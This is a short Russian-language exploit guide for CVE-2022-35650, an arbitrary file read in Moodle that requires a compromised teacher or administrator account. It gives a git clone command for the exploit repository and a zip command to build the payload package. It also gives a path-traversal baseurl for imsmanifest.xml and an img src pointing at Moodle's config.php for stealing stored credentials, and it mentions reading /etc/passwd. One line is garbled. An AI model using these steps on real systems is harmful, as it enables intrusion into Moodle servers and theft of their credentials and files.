
Эксплойт для CVE-2022-35650, произвольное чтение файлов в Moodle.
Это произвольное чтение файлов в Moodle.
Вам необходимо скомпрометировать пользователя уровня учителя или администратора.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) загружается./etc/passwd.Если вы хотите прочитать файл конфигурации (с ценными учётными данными), установите свой baseurl в imsmanifest.xml следующим образом:
../../../../../../../../../../../var/www/html
а src вашего img в pool.dat:
muc/config.php